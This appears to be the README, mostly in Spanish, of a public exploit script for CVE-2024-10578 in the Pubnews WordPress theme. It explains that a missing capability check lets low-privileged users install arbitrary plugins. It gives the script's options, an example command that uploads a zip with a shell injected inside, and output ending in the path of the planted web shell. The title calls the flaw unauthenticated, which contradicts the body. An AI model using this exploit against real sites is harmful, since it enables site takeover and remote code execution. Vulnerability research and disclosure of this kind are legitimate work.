
Pubnews <= 1.0.7 - Instalación arbitraria de plugins sin autenticación
El tema Pubnews para WordPress es vulnerable a la instalación no autorizada de plugins arbitrarios debido a una falta de comprobación de capacidades en la función pubnews_importer_plugin_action_for_notice() en todas las versiones hasta la 1.0.7 incluida. Esta vulnerabilidad permite a atacantes autenticados con acceso de nivel Suscriptor y superior instalar plugins arbitrarios que pueden aprovecharse para explotar otras vulnerabilidades.
Este script explota la vulnerabilidad en el tema Pubnews para instalar un plugin arbitrario desde una URL proporcionada. El plugin puede contener un shell malicioso o cualquier otro payload.
CVE-2024-10578.py [-h] -u URL -un USERNAME -p PASSWORD -url_zip PLUGIN_URL
Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation # By Nxploited, Khaled alenazi
options:
-h, --help show this help message and exit
-u, --url URL The URL of the WordPress site
-un, --username USERNAME
The username for WordPress login
-p, --password PASSWORD
The password for WordPress login
-url_zip, --plugin_url PLUGIN_URL
The plugin URL to install (must be a zip file with the shell injected inside)
python
CVE-2024-10578.py -u http://target/wordpress -un admin -p admin -url_zip http://target/shell1.zip
[+] Logged in successfully.
[+] Admin _wpnonce extracted: 6bf22371ab
[+] Plugin installed successfully.
[+] Plugin extracted. You can find the shell here: /wp-content/plugins/shell1/
Este script tiene fines exclusivamente educativos. El autor no aprueba el uso de este script para actividades ilegales. Úsalo de forma responsable y solo en sistemas en los que tengas permiso explícito para realizar pruebas.
Por: Nxploited | Khaled Alenazi